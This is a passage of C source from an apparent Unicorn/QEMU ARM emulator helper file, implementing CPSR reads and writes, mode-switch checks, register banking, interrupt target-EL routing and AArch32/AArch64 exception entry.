    case ARM_CPU_MODE_UND:
    case ARM_CPU_MODE_IRQ:
    case ARM_CPU_MODE_FIQ:
        /* Note that we don't implement the IMPDEF NSACR.RFR which in v7
         * allows FIQ mode to be Secure-only. (In v8 this doesn't exist.)
         */
        /* If HCR.TGE is set then changes from Monitor to NS PL1 via MSR
         * and CPS are treated as illegal mode changes.
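         * E.g. "msr CPSR_c, #0x13" (Monitor -> SVC) attempted while
         * HCR_EL2.TGE is in force returns 1 from here, so cpsr_write()
         * leaves CPSR.M unchanged (and sets CPSR.IL on v8).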
*/ if (write_type == CPSRWriteByInstr && (env->uncached_cpsr & CPSR_M) == ARM_CPU_MODE_MON && (arm_hcr_el2_eff(env) & HCR_TGE)) { return 1; } return 0; case ARM_CPU_MODE_HYP: return !arm_feature(env, ARM_FEATURE_EL2) || arm_current_el(env) < 2 || arm_is_secure_below_el3(env); case ARM_CPU_MODE_MON: return arm_current_el(env) < 3; default: return 1; } } uint32_t cpsr_read(CPUARMState *env) { int ZF; ZF = (env->ZF == 0); return env->uncached_cpsr | (env->NF & 0x80000000) | (ZF << 30) | (env->CF << 29) | ((env->VF & 0x80000000) >> 3) | (env->QF << 27) | (env->thumb << 5) | ((env->condexec_bits & 3) << 25) | ((env->condexec_bits & 0xfc) << 8) | (env->GE << 16) | (env->daif & CPSR_AIF); } void cpsr_write(CPUARMState *env, uint32_t val, uint32_t mask, CPSRWriteType write_type) { uint32_t changed_daif; if (mask & CPSR_NZCV) { env->ZF = (~val) & CPSR_Z; env->NF = val; env->CF = (val >> 29) & 1; env->VF = (val << 3) & 0x80000000; } if (mask & CPSR_Q) env->QF = ((val & CPSR_Q) != 0); if (mask & CPSR_T) env->thumb = ((val & CPSR_T) != 0); if (mask & CPSR_IT_0_1) { env->condexec_bits &= ~3; env->condexec_bits |= (val >> 25) & 3; } if (mask & CPSR_IT_2_7) { env->condexec_bits &= 3; env->condexec_bits |= (val >> 8) & 0xfc; } if (mask & CPSR_GE) { env->GE = (val >> 16) & 0xf; } /* In a V7 implementation that includes the security extensions but does * not include Virtualization Extensions the SCR.FW and SCR.AW bits control * whether non-secure software is allowed to change the CPSR_F and CPSR_A * bits respectively. * * In a V8 implementation, it is permitted for privileged software to * change the CPSR A/F bits regardless of the SCR.AW/FW bits. */ if (write_type != CPSRWriteByUnicorn && write_type != CPSRWriteRaw && !arm_feature(env, ARM_FEATURE_V8) && arm_feature(env, ARM_FEATURE_EL3) && !arm_feature(env, ARM_FEATURE_EL2) && !arm_is_secure(env)) { changed_daif = (env->daif ^ val) & mask; if (changed_daif & CPSR_A) { /* Check to see if we are allowed to change the masking of async * abort exceptions from a non-secure state. */ if (!(env->cp15.scr_el3 & SCR_AW)) { qemu_log_mask(LOG_GUEST_ERROR, "Ignoring attempt to switch CPSR_A flag from " "non-secure world with SCR.AW bit clear\n"); mask &= ~CPSR_A; } } if (changed_daif & CPSR_F) { /* Check to see if we are allowed to change the masking of FIQ * exceptions from a non-secure state. */ if (!(env->cp15.scr_el3 & SCR_FW)) { qemu_log_mask(LOG_GUEST_ERROR, "Ignoring attempt to switch CPSR_F flag from " "non-secure world with SCR.FW bit clear\n"); mask &= ~CPSR_F; } /* Check whether non-maskable FIQ (NMFI) support is enabled. * If this bit is set software is not allowed to mask * FIQs, but is allowed to set CPSR_F to 0. */ if ((A32_BANKED_CURRENT_REG_GET(env, sctlr) & SCTLR_NMFI) && (val & CPSR_F)) { qemu_log_mask(LOG_GUEST_ERROR, "Ignoring attempt to enable CPSR_F flag " "(non-maskable FIQ [NMFI] support enabled)\n"); mask &= ~CPSR_F; } } } env->daif &= ~(CPSR_AIF & mask); env->daif |= val & CPSR_AIF & mask; if (write_type != CPSRWriteRaw && ((env->uncached_cpsr ^ val) & mask & CPSR_M)) { if ((env->uncached_cpsr & CPSR_M) == ARM_CPU_MODE_USR) { /* Note that we can only get here in USR mode if this is a * gdb stub write; for this case we follow the architectural * behaviour for guest writes in USR mode of ignoring an attempt * to switch mode. (Those are caught by translate.c for writes * triggered by guest instructions.) */ // Unicorn: No, it can also be uc_reg_write, let user switch registers banks. 
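            // A sketch of the host-side trigger (error handling omitted):
            //     uint32_t cpsr;
            //     uc_reg_read(uc, UC_ARM_REG_CPSR, &cpsr);
            //     cpsr = (cpsr & ~0x1f) | 0x11;    // CPSR.M = FIQ mode
            //     uc_reg_write(uc, UC_ARM_REG_CPSR, &cpsr);
            // Such a write reaches this point as CPSRWriteByUnicorn and
            // takes the switch_mode() path below.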
if (write_type == CPSRWriteByUnicorn) { switch_mode(env, val & CPSR_M); } else { mask &= ~CPSR_M; } } else if (bad_mode_switch(env, val & CPSR_M, write_type)) { /* Attempt to switch to an invalid mode: this is UNPREDICTABLE in * v7, and has defined behaviour in v8: * + leave CPSR.M untouched * + allow changes to the other CPSR fields * + set PSTATE.IL * For user changes via the GDB stub, we don't set PSTATE.IL, * as this would be unnecessarily harsh for a user error. */ mask &= ~CPSR_M; if (write_type != CPSRWriteByGDBStub && arm_feature(env, ARM_FEATURE_V8)) { mask |= CPSR_IL; val |= CPSR_IL; } qemu_log_mask(LOG_GUEST_ERROR, "Illegal AArch32 mode switch attempt from %s to %s\n", aarch32_mode_name(env->uncached_cpsr), aarch32_mode_name(val)); } else { qemu_log_mask(CPU_LOG_INT, "%s %s to %s PC 0x%" PRIx32 "\n", write_type == CPSRWriteExceptionReturn ? "Exception return from AArch32" : "AArch32 mode switch from", aarch32_mode_name(env->uncached_cpsr), aarch32_mode_name(val), env->regs[15]); switch_mode(env, val & CPSR_M); } } mask &= ~CACHED_CPSR_BITS; env->uncached_cpsr = (env->uncached_cpsr & ~mask) | (val & mask); } /* Sign/zero extend */ uint32_t HELPER(sxtb16)(uint32_t x) { uint32_t res; res = (uint16_t)(int8_t)x; res |= (uint32_t)(int8_t)(x >> 16) << 16; return res; } uint32_t HELPER(uxtb16)(uint32_t x) { uint32_t res; res = (uint16_t)(uint8_t)x; res |= (uint32_t)(uint8_t)(x >> 16) << 16; return res; } int32_t HELPER(sdiv)(int32_t num, int32_t den) { if (den == 0) return 0; if (num == INT_MIN && den == -1) return INT_MIN; return num / den; } uint32_t HELPER(udiv)(uint32_t num, uint32_t den) { if (den == 0) return 0; return num / den; } uint32_t HELPER(rbit)(uint32_t x) { return revbit32(x); } static void switch_mode(CPUARMState *env, int mode) { int old_mode; int i; old_mode = env->uncached_cpsr & CPSR_M; if (mode == old_mode) return; if (old_mode == ARM_CPU_MODE_FIQ) { memcpy (env->fiq_regs, env->regs + 8, 5 * sizeof(uint32_t)); memcpy (env->regs + 8, env->usr_regs, 5 * sizeof(uint32_t)); } else if (mode == ARM_CPU_MODE_FIQ) { memcpy (env->usr_regs, env->regs + 8, 5 * sizeof(uint32_t)); memcpy (env->regs + 8, env->fiq_regs, 5 * sizeof(uint32_t)); } i = bank_number(old_mode); env->banked_r13[i] = env->regs[13]; env->banked_spsr[i] = env->spsr; i = bank_number(mode); env->regs[13] = env->banked_r13[i]; env->spsr = env->banked_spsr[i]; env->banked_r14[r14_bank_number(old_mode)] = env->regs[14]; env->regs[14] = env->banked_r14[r14_bank_number(mode)]; } /* Physical Interrupt Target EL Lookup Table * * [ From ARM ARM section G1.13.4 (Table G1-15) ] * * The below multi-dimensional table is used for looking up the target * exception level given numerous condition criteria. Specifically, the * target EL is based on SCR and HCR routing controls as well as the * currently executing EL and secure state. * * Dimensions: * target_el_table[2][2][2][2][2][4] * | | | | | +--- Current EL * | | | | +------ Non-secure(0)/Secure(1) * | | | +--------- HCR mask override * | | +------------ SCR exec state control * | +--------------- SCR mask override * +------------------ 32-bit(0)/64-bit(1) EL3 * * The table values are as such: * 0-3 = EL0-EL3 * -1 = Cannot occur * * The ARM ARM target EL table includes entries indicating that an "exception * is not taken". The two cases where this is applicable are: * 1) An exception is taken from EL3 but the SCR does not have the exception * routed to EL3. * 2) An exception is taken from EL2 but the HCR does not have the exception * routed to EL2. 
* In these two cases, the below table contain a target of EL1. This value is * returned as it is expected that the consumer of the table data will check * for "target EL >= current EL" to ensure the exception is not taken. * * SCR HCR * 64 EA AMO From * BIT IRQ IMO Non-secure Secure * EL3 FIQ RW FMO EL0 EL1 EL2 EL3 EL0 EL1 EL2 EL3 */ static const int8_t target_el_table[2][2][2][2][2][4] = { {{{{/* 0 0 0 0 */{ 1, 1, 2, -1 },{ 3, -1, -1, 3 },}, {/* 0 0 0 1 */{ 2, 2, 2, -1 },{ 3, -1, -1, 3 },},}, {{/* 0 0 1 0 */{ 1, 1, 2, -1 },{ 3, -1, -1, 3 },}, {/* 0 0 1 1 */{ 2, 2, 2, -1 },{ 3, -1, -1, 3 },},},}, {{{/* 0 1 0 0 */{ 3, 3, 3, -1 },{ 3, -1, -1, 3 },}, {/* 0 1 0 1 */{ 3, 3, 3, -1 },{ 3, -1, -1, 3 },},}, {{/* 0 1 1 0 */{ 3, 3, 3, -1 },{ 3, -1, -1, 3 },}, {/* 0 1 1 1 */{ 3, 3, 3, -1 },{ 3, -1, -1, 3 },},},},}, {{{{/* 1 0 0 0 */{ 1, 1, 2, -1 },{ 1, 1, -1, 1 },}, {/* 1 0 0 1 */{ 2, 2, 2, -1 },{ 1, 1, -1, 1 },},}, {{/* 1 0 1 0 */{ 1, 1, 1, -1 },{ 1, 1, -1, 1 },}, {/* 1 0 1 1 */{ 2, 2, 2, -1 },{ 1, 1, -1, 1 },},},}, {{{/* 1 1 0 0 */{ 3, 3, 3, -1 },{ 3, 3, -1, 3 },}, {/* 1 1 0 1 */{ 3, 3, 3, -1 },{ 3, 3, -1, 3 },},}, {{/* 1 1 1 0 */{ 3, 3, 3, -1 },{ 3, 3, -1, 3 },}, {/* 1 1 1 1 */{ 3, 3, 3, -1 },{ 3, 3, -1, 3 },},},},}, }; /* * Determine the target EL for physical exceptions */ uint32_t arm_phys_excp_target_el(CPUState *cs, uint32_t excp_idx, uint32_t cur_el, bool secure) { CPUARMState *env = cs->env_ptr; bool rw; bool scr; bool hcr; int target_el; /* Is the highest EL AArch64? */ bool is64 = arm_feature(env, ARM_FEATURE_AARCH64); uint64_t hcr_el2; if (arm_feature(env, ARM_FEATURE_EL3)) { rw = ((env->cp15.scr_el3 & SCR_RW) == SCR_RW); } else { /* Either EL2 is the highest EL (and so the EL2 register width * is given by is64); or there is no EL2 or EL3, in which case * the value of 'rw' does not affect the table lookup anyway. */ rw = is64; } hcr_el2 = arm_hcr_el2_eff(env); switch (excp_idx) { case EXCP_IRQ: scr = ((env->cp15.scr_el3 & SCR_IRQ) == SCR_IRQ); hcr = hcr_el2 & HCR_IMO; break; case EXCP_FIQ: scr = ((env->cp15.scr_el3 & SCR_FIQ) == SCR_FIQ); hcr = hcr_el2 & HCR_FMO; break; default: scr = ((env->cp15.scr_el3 & SCR_EA) == SCR_EA); hcr = hcr_el2 & HCR_AMO; break; }; /* * For these purposes, TGE and AMO/IMO/FMO both force the * interrupt to EL2. Fold TGE into the bit extracted above. */ hcr |= (hcr_el2 & HCR_TGE) != 0; /* Perform a table-lookup for the target EL given the current state */ target_el = target_el_table[is64][scr][rw][hcr][secure][cur_el]; assert(target_el > 0); return target_el; } /* * Function used to synchronize QEMU's AArch64 register set with AArch32 * register set. This is necessary when switching between AArch32 and AArch64 * execution state. */ void aarch64_sync_32_to_64(CPUARMState *env) { int i; uint32_t mode = env->uncached_cpsr & CPSR_M; /* We can blanket copy R[0:7] to X[0:7] */ for (i = 0; i < 8; i++) { env->xregs[i] = env->regs[i]; } /* * Unless we are in FIQ mode, x8-x12 come from the user registers r8-r12. * Otherwise, they come from the banked user regs. */ if (mode == ARM_CPU_MODE_FIQ) { for (i = 8; i < 13; i++) { env->xregs[i] = env->usr_regs[i - 8]; } } else { for (i = 8; i < 13; i++) { env->xregs[i] = env->regs[i]; } } /* * Registers x13-x23 are the various mode SP and FP registers. Registers * r13 and r14 are only copied if we are in that mode, otherwise we copy * from the mode banked register. 
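     *
     * The resulting fixed layout is:
     *   x13/x14: SP_usr/LR_usr    x15: SP_hyp
     *   x16/x17: LR_irq/SP_irq    x18/x19: LR_svc/SP_svc
     *   x20/x21: LR_abt/SP_abt    x22/x23: LR_und/SP_und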
*/ if (mode == ARM_CPU_MODE_USR || mode == ARM_CPU_MODE_SYS) { env->xregs[13] = env->regs[13]; env->xregs[14] = env->regs[14]; } else { env->xregs[13] = env->banked_r13[bank_number(ARM_CPU_MODE_USR)]; /* HYP is an exception in that it is copied from r14 */ if (mode == ARM_CPU_MODE_HYP) { env->xregs[14] = env->regs[14]; } else { env->xregs[14] = env->banked_r14[r14_bank_number(ARM_CPU_MODE_USR)]; } } if (mode == ARM_CPU_MODE_HYP) { env->xregs[15] = env->regs[13]; } else { env->xregs[15] = env->banked_r13[bank_number(ARM_CPU_MODE_HYP)]; } if (mode == ARM_CPU_MODE_IRQ) { env->xregs[16] = env->regs[14]; env->xregs[17] = env->regs[13]; } else { env->xregs[16] = env->banked_r14[r14_bank_number(ARM_CPU_MODE_IRQ)]; env->xregs[17] = env->banked_r13[bank_number(ARM_CPU_MODE_IRQ)]; } if (mode == ARM_CPU_MODE_SVC) { env->xregs[18] = env->regs[14]; env->xregs[19] = env->regs[13]; } else { env->xregs[18] = env->banked_r14[r14_bank_number(ARM_CPU_MODE_SVC)]; env->xregs[19] = env->banked_r13[bank_number(ARM_CPU_MODE_SVC)]; } if (mode == ARM_CPU_MODE_ABT) { env->xregs[20] = env->regs[14]; env->xregs[21] = env->regs[13]; } else { env->xregs[20] = env->banked_r14[r14_bank_number(ARM_CPU_MODE_ABT)]; env->xregs[21] = env->banked_r13[bank_number(ARM_CPU_MODE_ABT)]; } if (mode == ARM_CPU_MODE_UND) { env->xregs[22] = env->regs[14]; env->xregs[23] = env->regs[13]; } else { env->xregs[22] = env->banked_r14[r14_bank_number(ARM_CPU_MODE_UND)]; env->xregs[23] = env->banked_r13[bank_number(ARM_CPU_MODE_UND)]; } /* * Registers x24-x30 are mapped to r8-r14 in FIQ mode. If we are in FIQ * mode, then we can copy from r8-r14. Otherwise, we copy from the * FIQ bank for r8-r14. */ if (mode == ARM_CPU_MODE_FIQ) { for (i = 24; i < 31; i++) { env->xregs[i] = env->regs[i - 16]; /* X[24:30] <- R[8:14] */ } } else { for (i = 24; i < 29; i++) { env->xregs[i] = env->fiq_regs[i - 24]; } env->xregs[29] = env->banked_r13[bank_number(ARM_CPU_MODE_FIQ)]; env->xregs[30] = env->banked_r14[r14_bank_number(ARM_CPU_MODE_FIQ)]; } env->pc = env->regs[15]; } /* * Function used to synchronize QEMU's AArch32 register set with AArch64 * register set. This is necessary when switching between AArch32 and AArch64 * execution state. */ void aarch64_sync_64_to_32(CPUARMState *env) { int i; uint32_t mode = env->uncached_cpsr & CPSR_M; /* We can blanket copy X[0:7] to R[0:7] */ for (i = 0; i < 8; i++) { env->regs[i] = env->xregs[i]; } /* * Unless we are in FIQ mode, r8-r12 come from the user registers x8-x12. * Otherwise, we copy x8-x12 into the banked user regs. */ if (mode == ARM_CPU_MODE_FIQ) { for (i = 8; i < 13; i++) { env->usr_regs[i - 8] = env->xregs[i]; } } else { for (i = 8; i < 13; i++) { env->regs[i] = env->xregs[i]; } } /* * Registers r13 & r14 depend on the current mode. * If we are in a given mode, we copy the corresponding x registers to r13 * and r14. Otherwise, we copy the x register to the banked r13 and r14 * for the mode. 
     */
    if (mode == ARM_CPU_MODE_USR || mode == ARM_CPU_MODE_SYS) {
        env->regs[13] = env->xregs[13];
        env->regs[14] = env->xregs[14];
    } else {
        env->banked_r13[bank_number(ARM_CPU_MODE_USR)] = env->xregs[13];

        /*
         * HYP is an exception in that it does not have its own banked r14 but
         * shares the USR r14
         */
        if (mode == ARM_CPU_MODE_HYP) {
            env->regs[14] = env->xregs[14];
        } else {
            env->banked_r14[r14_bank_number(ARM_CPU_MODE_USR)] = env->xregs[14];
        }
    }

    if (mode == ARM_CPU_MODE_HYP) {
        env->regs[13] = env->xregs[15];
    } else {
        env->banked_r13[bank_number(ARM_CPU_MODE_HYP)] = env->xregs[15];
    }

    if (mode == ARM_CPU_MODE_IRQ) {
        env->regs[14] = env->xregs[16];
        env->regs[13] = env->xregs[17];
    } else {
        env->banked_r14[r14_bank_number(ARM_CPU_MODE_IRQ)] = env->xregs[16];
        env->banked_r13[bank_number(ARM_CPU_MODE_IRQ)] = env->xregs[17];
    }

    if (mode == ARM_CPU_MODE_SVC) {
        env->regs[14] = env->xregs[18];
        env->regs[13] = env->xregs[19];
    } else {
        env->banked_r14[r14_bank_number(ARM_CPU_MODE_SVC)] = env->xregs[18];
        env->banked_r13[bank_number(ARM_CPU_MODE_SVC)] = env->xregs[19];
    }

    if (mode == ARM_CPU_MODE_ABT) {
        env->regs[14] = env->xregs[20];
        env->regs[13] = env->xregs[21];
    } else {
        env->banked_r14[r14_bank_number(ARM_CPU_MODE_ABT)] = env->xregs[20];
        env->banked_r13[bank_number(ARM_CPU_MODE_ABT)] = env->xregs[21];
    }

    if (mode == ARM_CPU_MODE_UND) {
        env->regs[14] = env->xregs[22];
        env->regs[13] = env->xregs[23];
    } else {
        env->banked_r14[r14_bank_number(ARM_CPU_MODE_UND)] = env->xregs[22];
        env->banked_r13[bank_number(ARM_CPU_MODE_UND)] = env->xregs[23];
    }

    /* Registers x24-x30 are mapped to r8-r14 in FIQ mode. If we are in FIQ
     * mode, then we can copy to r8-r14. Otherwise, we copy to the
     * FIQ bank for r8-r14.
     */
    if (mode == ARM_CPU_MODE_FIQ) {
        for (i = 24; i < 31; i++) {
            env->regs[i - 16] = env->xregs[i];   /* X[24:30] -> R[8:14] */
        }
    } else {
        for (i = 24; i < 29; i++) {
            env->fiq_regs[i - 24] = env->xregs[i];
        }
        env->banked_r13[bank_number(ARM_CPU_MODE_FIQ)] = env->xregs[29];
        env->banked_r14[r14_bank_number(ARM_CPU_MODE_FIQ)] = env->xregs[30];
    }

    env->regs[15] = env->pc;
}

static void take_aarch32_exception(CPUARMState *env, int new_mode,
                                   uint32_t mask, uint32_t offset,
                                   uint32_t newpc)
{
    int new_el;

    /* Change the CPU state so as to actually take the exception. */
    switch_mode(env, new_mode);

    /*
     * For exceptions taken to AArch32 we must clear the SS bit in both
     * PSTATE and in the old-state value we save to SPSR_<mode>, so zero it now.
     */
    env->uncached_cpsr &= ~PSTATE_SS;
    env->spsr = cpsr_read(env);
    /* Clear IT bits. */
    env->condexec_bits = 0;
    /* Switch to the new mode, and to the correct instruction set. */
    env->uncached_cpsr = (env->uncached_cpsr & ~CPSR_M) | new_mode;
    /* This must be after mode switching. */
    new_el = arm_current_el(env);
    /* Set new mode endianness */
    env->uncached_cpsr &= ~CPSR_E;
    if (env->cp15.sctlr_el[new_el] & SCTLR_EE) {
        env->uncached_cpsr |= CPSR_E;
    }
    /* J and IL must always be cleared for exception entry */
    env->uncached_cpsr &= ~(CPSR_IL | CPSR_J);
    env->daif |= mask;

    if (new_mode == ARM_CPU_MODE_HYP) {
        env->thumb = (env->cp15.sctlr_el[2] & SCTLR_TE) != 0;
        env->elr_el[2] = env->regs[15];
    } else {
        /* CPSR.PAN is normally preserved unless... */
        if (cpu_isar_feature(aa32_pan, env_archcpu(env))) {
            switch (new_el) {
            case 3:
                if (!arm_is_secure_below_el3(env)) {
                    /* ... the target is EL3, from non-secure state. */
                    env->uncached_cpsr &= ~CPSR_PAN;
                    break;
                }
                /* ... the target is EL3, from secure state ... */
                /* fall through */
            case 1:
                /* ... the target is EL1 and SCTLR.SPAN is 0.
*/ if (!(env->cp15.sctlr_el[new_el] & SCTLR_SPAN)) { env->uncached_cpsr |= CPSR_PAN; } break; } } /* * this is a lie, as there was no c1_sys on V4T/V5, but who cares * and we should just guard the thumb mode on V4 */ if (arm_feature(env, ARM_FEATURE_V4T)) { env->thumb = (A32_BANKED_CURRENT_REG_GET(env, sctlr) & SCTLR_TE) != 0; } env->regs[14] = env->regs[15] + offset; } env->regs[15] = newpc; arm_rebuild_hflags(env); } static void arm_cpu_do_interrupt_aarch32_hyp(CPUState *cs) { /* * Handle exception entry to Hyp mode; this is sufficiently * different to entry to other AArch32 modes that we handle it * separately here. * * The vector table entry used is always the 0x14 Hyp mode entry point, * unless this is an UNDEF/HVC/abort taken from Hyp to Hyp. * The offset applied to the preferred return address is always zero * (see DDI0487C.a section G1.12.3). * PSTATE A/I/F masks are set based only on the SCR.EA/IRQ/FIQ values. */ uint32_t addr, mask; ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; switch (cs->exception_index) { case EXCP_UDEF: addr = 0x04; break; case EXCP_SWI: addr = 0x14; break; case EXCP_BKPT: /* Fall through to prefetch abort. */ case EXCP_PREFETCH_ABORT: env->cp15.ifar_s = env->exception.vaddress; qemu_log_mask(CPU_LOG_INT, "...with HIFAR 0x%x\n", (uint32_t)env->exception.vaddress); addr = 0x0c; break; case EXCP_DATA_ABORT: env->cp15.dfar_s = env->exception.vaddress; qemu_log_mask(CPU_LOG_INT, "...with HDFAR 0x%x\n", (uint32_t)env->exception.vaddress); addr = 0x10; break; case EXCP_IRQ: addr = 0x18; break; case EXCP_FIQ: addr = 0x1c; break; case EXCP_HVC: addr = 0x08; break; case EXCP_HYP_TRAP: addr = 0x14; break; default: cpu_abort(cs, "Unhandled exception 0x%x\n", cs->exception_index); } if (cs->exception_index != EXCP_IRQ && cs->exception_index != EXCP_FIQ) { if (!arm_feature(env, ARM_FEATURE_V8)) { /* * QEMU syndrome values are v8-style. v7 has the IL bit * UNK/SBZP for "field not valid" cases, where v8 uses RES1. * If this is a v7 CPU, squash the IL bit in those cases. 
*/ if (cs->exception_index == EXCP_PREFETCH_ABORT || (cs->exception_index == EXCP_DATA_ABORT && !(env->exception.syndrome & ARM_EL_ISV)) || syn_get_ec(env->exception.syndrome) == EC_UNCATEGORIZED) { env->exception.syndrome &= ~ARM_EL_IL; } } env->cp15.esr_el[2] = env->exception.syndrome; } if (arm_current_el(env) != 2 && addr < 0x14) { addr = 0x14; } mask = 0; if (!(env->cp15.scr_el3 & SCR_EA)) { mask |= CPSR_A; } if (!(env->cp15.scr_el3 & SCR_IRQ)) { mask |= CPSR_I; } if (!(env->cp15.scr_el3 & SCR_FIQ)) { mask |= CPSR_F; } addr += env->cp15.hvbar; take_aarch32_exception(env, ARM_CPU_MODE_HYP, mask, 0, addr); } static void arm_cpu_do_interrupt_aarch32_qemu(CPUState *cs) { ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; uint32_t addr; uint32_t mask; int new_mode; uint32_t offset; uint32_t moe; /* If this is a debug exception we must update the DBGDSCR.MOE bits */ switch (syn_get_ec(env->exception.syndrome)) { case EC_BREAKPOINT: case EC_BREAKPOINT_SAME_EL: moe = 1; break; case EC_WATCHPOINT: case EC_WATCHPOINT_SAME_EL: moe = 10; break; case EC_AA32_BKPT: moe = 3; break; case EC_VECTORCATCH: moe = 5; break; default: moe = 0; break; } if (moe) { env->cp15.mdscr_el1 = deposit64(env->cp15.mdscr_el1, 2, 4, moe); } if (env->exception.target_el == 2) { arm_cpu_do_interrupt_aarch32_hyp(cs); return; } switch (cs->exception_index) { case EXCP_UDEF: new_mode = ARM_CPU_MODE_UND; addr = 0x04; mask = CPSR_I; if (env->thumb) offset = 2; else offset = 4; break; case EXCP_SWI: new_mode = ARM_CPU_MODE_SVC; addr = 0x08; mask = CPSR_I; /* The PC already points to the next instruction. */ offset = 0; break; case EXCP_BKPT: /* Fall through to prefetch abort. */ case EXCP_PREFETCH_ABORT: A32_BANKED_CURRENT_REG_SET(env, ifsr, env->exception.fsr); A32_BANKED_CURRENT_REG_SET(env, ifar, env->exception.vaddress); qemu_log_mask(CPU_LOG_INT, "...with IFSR 0x%x IFAR 0x%x\n", env->exception.fsr, (uint32_t)env->exception.vaddress); new_mode = ARM_CPU_MODE_ABT; addr = 0x0c; mask = CPSR_A | CPSR_I; offset = 4; break; case EXCP_DATA_ABORT: A32_BANKED_CURRENT_REG_SET(env, dfsr, env->exception.fsr); A32_BANKED_CURRENT_REG_SET(env, dfar, env->exception.vaddress); qemu_log_mask(CPU_LOG_INT, "...with DFSR 0x%x DFAR 0x%x\n", env->exception.fsr, (uint32_t)env->exception.vaddress); new_mode = ARM_CPU_MODE_ABT; addr = 0x10; mask = CPSR_A | CPSR_I; offset = 8; break; case EXCP_IRQ: new_mode = ARM_CPU_MODE_IRQ; addr = 0x18; /* Disable IRQ and imprecise data aborts. */ mask = CPSR_A | CPSR_I; offset = 4; if (env->cp15.scr_el3 & SCR_IRQ) { /* IRQ routed to monitor mode */ new_mode = ARM_CPU_MODE_MON; mask |= CPSR_F; } break; case EXCP_FIQ: new_mode = ARM_CPU_MODE_FIQ; addr = 0x1c; /* Disable FIQ, IRQ and imprecise data aborts. */ mask = CPSR_A | CPSR_I | CPSR_F; if (env->cp15.scr_el3 & SCR_FIQ) { /* FIQ routed to monitor mode */ new_mode = ARM_CPU_MODE_MON; } offset = 4; break; case EXCP_VIRQ: new_mode = ARM_CPU_MODE_IRQ; addr = 0x18; /* Disable IRQ and imprecise data aborts. */ mask = CPSR_A | CPSR_I; offset = 4; break; case EXCP_VFIQ: new_mode = ARM_CPU_MODE_FIQ; addr = 0x1c; /* Disable FIQ, IRQ and imprecise data aborts. */ mask = CPSR_A | CPSR_I | CPSR_F; offset = 4; break; case EXCP_SMC: new_mode = ARM_CPU_MODE_MON; addr = 0x08; mask = CPSR_A | CPSR_I | CPSR_F; offset = 0; break; default: cpu_abort(cs, "Unhandled exception 0x%x\n", cs->exception_index); return; /* Never happens. Keep compiler happy. 
*/ } if (new_mode == ARM_CPU_MODE_MON) { addr += env->cp15.mvbar; } else if (A32_BANKED_CURRENT_REG_GET(env, sctlr) & SCTLR_V) { /* High vectors. When enabled, base address cannot be remapped. */ addr += 0xffff0000; } else { /* ARM v7 architectures provide a vector base address register to remap * the interrupt vector table. * This register is only followed in non-monitor mode, and is banked. * Note: only bits 31:5 are valid. */ addr += A32_BANKED_CURRENT_REG_GET(env, vbar); } if ((env->uncached_cpsr & CPSR_M) == ARM_CPU_MODE_MON) { env->cp15.scr_el3 &= ~SCR_NS; } take_aarch32_exception(env, new_mode, mask, offset, addr); } /* Handle exception entry to a target EL which is using AArch64 */ static void arm_cpu_do_interrupt_aarch64_qemu(CPUState *cs) { ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; unsigned int new_el = env->exception.target_el; target_ulong addr = env->cp15.vbar_el[new_el]; unsigned int new_mode = aarch64_pstate_mode(new_el, true); unsigned int old_mode; unsigned int cur_el = arm_current_el(env); /* * Note that new_el can never be 0. If cur_el is 0, then * el0_a64 is is_a64(), else el0_a64 is ignored. */ aarch64_sve_change_el(env, cur_el, new_el, is_a64(env)); if (cur_el < new_el) { /* Entry vector offset depends on whether the implemented EL * immediately lower than the target level is using AArch32 or AArch64 */ bool is_aa64 = false; uint64_t hcr; switch (new_el) { case 3: is_aa64 = (env->cp15.scr_el3 & SCR_RW) != 0; break; case 2: hcr = arm_hcr_el2_eff(env); if ((hcr & (HCR_E2H | HCR_TGE)) != (HCR_E2H | HCR_TGE)) { is_aa64 = (hcr & HCR_RW) != 0; break; } /* fall through */ case 1: is_aa64 = is_a64(env); break; default: g_assert_not_reached(); break; } if (is_aa64) { addr += 0x400; } else { addr += 0x600; } } else if (pstate_read(env) & PSTATE_SP) { addr += 0x200; } switch (cs->exception_index) { case EXCP_PREFETCH_ABORT: case EXCP_DATA_ABORT: env->cp15.far_el[new_el] = env->exception.vaddress; qemu_log_mask(CPU_LOG_INT, "...with FAR 0x%" PRIx64 "\n", env->cp15.far_el[new_el]); /* fall through */ case EXCP_BKPT: case EXCP_UDEF: case EXCP_SWI: case EXCP_HVC: case EXCP_HYP_TRAP: case EXCP_SMC: if (syn_get_ec(env->exception.syndrome) == EC_ADVSIMDFPACCESSTRAP) { /* * QEMU internal FP/SIMD syndromes from AArch32 include the * TA and coproc fields which are only exposed if the exception * is taken to AArch32 Hyp mode. Mask them out to get a valid * AArch64 format syndrome. */ env->exception.syndrome &= ~MAKE_64BIT_MASK(0, 20); } env->cp15.esr_el[new_el] = env->exception.syndrome; break; case EXCP_IRQ: case EXCP_VIRQ: addr += 0x80; break; case EXCP_FIQ: case EXCP_VFIQ: addr += 0x100; break; default: cpu_abort(cs, "Unhandled exception 0x%x\n", cs->exception_index); } if (is_a64(env)) { old_mode = pstate_read(env); aarch64_save_sp(env, arm_current_el(env)); env->elr_el[new_el] = env->pc; } else { old_mode = cpsr_read(env); env->elr_el[new_el] = env->regs[15]; aarch64_sync_32_to_64(env); env->condexec_bits = 0; } env->banked_spsr[aarch64_banked_spsr_index(new_el)] = old_mode; qemu_log_mask(CPU_LOG_INT, "...with ELR 0x%" PRIx64 "\n", env->elr_el[new_el]); if (cpu_isar_feature(aa64_pan, cpu)) { /* The value of PSTATE.PAN is normally preserved, except when ... */ new_mode |= old_mode & PSTATE_PAN; switch (new_el) { case 2: /* ... the target is EL2 with HCR_EL2.{E2H,TGE} == '11' ... */ if ((arm_hcr_el2_eff(env) & (HCR_E2H | HCR_TGE)) != (HCR_E2H | HCR_TGE)) { break; } /* fall through */ case 1: /* ... the target is EL1 ... */ /* ... and SCTLR_ELx.SPAN == 0, then set to 1. 
